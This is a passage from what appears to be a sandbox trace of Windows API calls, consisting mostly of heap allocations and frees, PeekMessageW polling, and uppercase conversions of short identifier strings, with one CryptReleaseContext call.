(hKey=0xaa59a0) returned 1 [0204.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0204.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0204.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0204.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0204.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0204.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0204.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0204.459] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0204.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0204.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0204.459] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0204.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0204.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0204.459] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0204.459] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0204.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0204.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0204.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0204.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0204.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0204.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0204.460] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0204.460] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0204.460] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0204.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0204.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0204.460] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0204.460] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0204.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0204.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0204.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0204.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0204.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0204.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0204.460] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0204.460] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0204.460] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0204.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0204.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0204.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0204.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0204.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0204.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0204.461] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0204.461] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0204.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0204.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0204.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0204.462] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0204.462] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0204.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0204.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0204.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0204.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0204.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0204.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0204.462] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0204.462] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0204.462] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0204.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0204.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0204.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0204.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0204.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0204.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0204.463] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0204.463] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0204.463] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0204.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0204.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0204.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0204.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0204.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0204.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0204.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0204.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0204.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0204.463] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0204.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0204.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0204.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0204.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0204.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0204.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0204.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0204.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0204.464] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0204.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0204.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0204.464] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0204.464] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0204.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0204.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0204.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0204.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0204.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0204.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0204.464] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0204.464] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0204.464] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0204.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0204.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0204.464] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0204.464] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0204.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0204.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0204.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0204.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0204.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0204.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0204.465] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0204.465] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0204.465] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0204.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0204.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0204.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0204.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0204.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0204.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0204.465] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0204.465] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0204.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0204.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0204.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0204.465] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0204.465] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0204.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0204.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0204.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0204.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0204.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0204.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0204.466] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0204.466] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0204.466] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0204.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0204.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0204.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0204.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0204.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0204.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0204.466] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0204.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0204.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0204.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0204.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0204.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0204.466] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0204.466] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0204.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0204.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0204.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0204.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0204.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0204.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0204.467] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0204.467] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0204.467] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0204.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0204.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0204.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0204.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0204.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0204.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0204.467] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0204.467] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0204.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0204.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0204.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0204.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0204.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0204.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0204.468] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0204.468] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0204.468] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0204.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0204.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0204.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0204.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0204.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0204.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0204.468] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0204.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0204.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0204.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0204.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0204.468] CryptReleaseContext (hProv=0xad2698, dwFlags=0x0) returned 1 [0204.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0204.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa248 [0204.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0204.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0204.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0204.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0204.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0204.469] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0204.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0204.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0204.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0204.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0204.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0204.469] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0204.469] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0204.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0204.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0204.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0204.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0204.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0204.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0204.469] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0204.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0204.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0204.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0204.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0204.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0204.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0204.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0204.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0204.470] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0204.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0204.470] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0204.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0204.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0204.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0204.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0204.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0204.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0204.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0204.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0204.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0204.470] HeapFree (in: 